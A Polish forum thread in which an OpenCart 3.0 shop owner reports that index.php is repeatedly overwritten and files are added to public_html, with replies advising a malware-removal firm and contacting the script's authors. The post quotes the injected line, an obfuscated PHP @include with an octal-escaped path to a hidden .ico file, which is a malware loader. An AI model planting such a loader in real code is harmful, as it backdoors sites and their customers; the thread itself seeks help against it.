cześć
nie wiem czy w dobry dział wszedłem ale mam następujący problem i jestem bezsilny
mam sklep na opencart wersja 3.0
i od jakiegoś czasu walczę z wirusami albo nadpisuję mi się plik index.php albo dodają się pliki do folderu public_html
zmiana hasła do serwera nie pomaga kod mam cały przeanalizowany wygląda na to, że jest czysty
mój komputer też jest czysty, mam jeszcze inne serwery i tam jest wszystko ok.
Akcja z dzisiaj: nadpisanie pliku index.php następującym kodem:
/*dbd7a*/
@include "\057ho\155e/\155ax\164er\0703/\144om\141in\163/m\141xt\145r.\160l/\160ub\154ic\137ht\155l/\143at\141lo\147/c\157nt\162ol\154er\057st\141rt\165p/\056db\1462f\06654\056ic\157";
/*dbd7a*/
dodatkowo na serwerze mam uruchomiony open base dir
programista
znaczy pewności nie mamy w 100%
ale czy tego typu działania (nadpisywanie plików) są związane ze szkodliwym kodem który mamy gdzieś na sklepie ?
Ameryki pewnie nie odkryje pisząc żebyś skontaktował się z jakąś firma od usuwania wszelkiego złośliwego kodu i która może wdrożyć jakieś zabezpieczenia. Przydaloby się napisać do twórców tegpo skryptu czy mieli podobne zgloszeni a bo być może jest gdzieś dziura
Powered by Invision Power Board (http://www.invisionboard.com)
© Invision Power Services (http://www.invisionpower.com)